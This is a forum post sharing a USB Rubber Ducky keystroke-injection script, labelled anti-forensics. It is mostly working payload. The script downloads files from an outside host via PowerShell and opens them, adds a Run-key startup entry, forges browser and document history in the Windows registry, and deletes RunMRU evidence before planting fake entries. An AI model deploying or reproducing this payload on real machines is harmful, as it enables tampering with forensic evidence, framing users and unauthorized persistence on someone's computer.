Jump to content

Rubber Ducky used at the Information Warfare Center


Recommended Posts

Found this while studying. Interesting.. Hope you guys like it.

http://www.informationwarfarecenter.com/Cyber-Secrets.html

http://www.informationwarfarecenter.com/files/rubber-ducky-frame-job.txt

REM Calling this the rubber ducky frame job.  This adds fake information into Windows Registry areas forensicREM analysts use to track internet usage.REM Author: Jeremy Martin - jeremy@informationwarfarecenter.comREM Class: Anti ForensicsREM version 0.1.3DELAY 1000GUI rDELAY 1000REM Download a file and save it into the temp folderSTRING powershell (new-object System.Net.WebClient).DownloadFile('http://www.informationwarfarecenter.com/CIR/CIR.pdf','%TEMP%\latest-CIR.pdf')ENTERDELAY 1000GUI rDELAY 1000Download a graphic and save it to tempSTRING powershell (new-object System.Net.WebClient).DownloadFile('http://www.informationwarfarecenter.com/back.jpg','%TEMP%\back.jpg')ENTERDELAY 1000GUI rDELAY 1000REM Open Intenet Explorer and generate trafficSTRING iexplore.exe http://www.informationwarfarecenter.com/index-4.htmlDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Internet Explorer historySTRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url1 /d http://www.informationwarfarecenter.com/files/rubber-ducky-frame-job.txt /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Internet Explorer historySTRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url2 /d http://www.i-never-went-here.com /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Internet Explorer historySTRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url3 /d http://www.i-never-went-here-again.com /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Internet Explorer historySTRING REG ADD "HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs" /v url4 /d http://www.i-just-faked-the-url-address.com /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Internet Explorer historySTRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths" /v url1 /d C:\i-just-faked-the-folder /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Fake Document HistorySTRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs" /v 0 /d fake-data /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Add a startup link for a previously downloaded file.  Malware uses this quite often.STRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v fakefile /d "%TEMP%\latest-CIR.pdf" /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Changes the background to the previously downloaded graphicSTRING REG ADD "HKCU\Control Panel\Desktop" /v Wallpaper /d %TEMP%\back.jpg /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Opens a previously downloaded fileSTRING powershell Start-Process "%TEMP%\latest-CIR.pdf"ENTERDELAY 1500GUI rDELAY 1000REM Removes evidence of previous entriesSTRING REG DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /va /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Add another fake evidence entrySTRING REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /v a /d "iexplore www.informationwarfarecenter.com/files/BGIU.zip" /fDELAY 1000ENTERDELAY 1000GUI rDELAY 1000REM Opens a previously downloaded graphicSTRING %TEMP%/back.jpgDELAY 1000ENTERDELAY 1000
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...